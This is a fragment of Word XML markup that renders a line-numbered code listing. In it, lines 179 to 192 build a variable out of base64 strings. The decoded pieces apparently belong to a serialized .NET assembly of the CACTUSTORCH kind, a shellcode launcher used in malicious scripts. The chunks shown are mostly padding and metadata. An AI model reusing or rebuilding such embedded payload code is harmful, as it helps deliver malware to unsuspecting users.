          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"VQBTAFQATwBSAEMASAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEAL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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>w"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>179</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>180</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"LgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>181</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>182</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAAAAAAAAAAAAAAADAAAAwAAAB0NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>183</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>184</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>185</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>186</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>187</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>188</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>189</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>190</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>191</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjd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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Gl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>v"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>192</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="7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996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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659800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
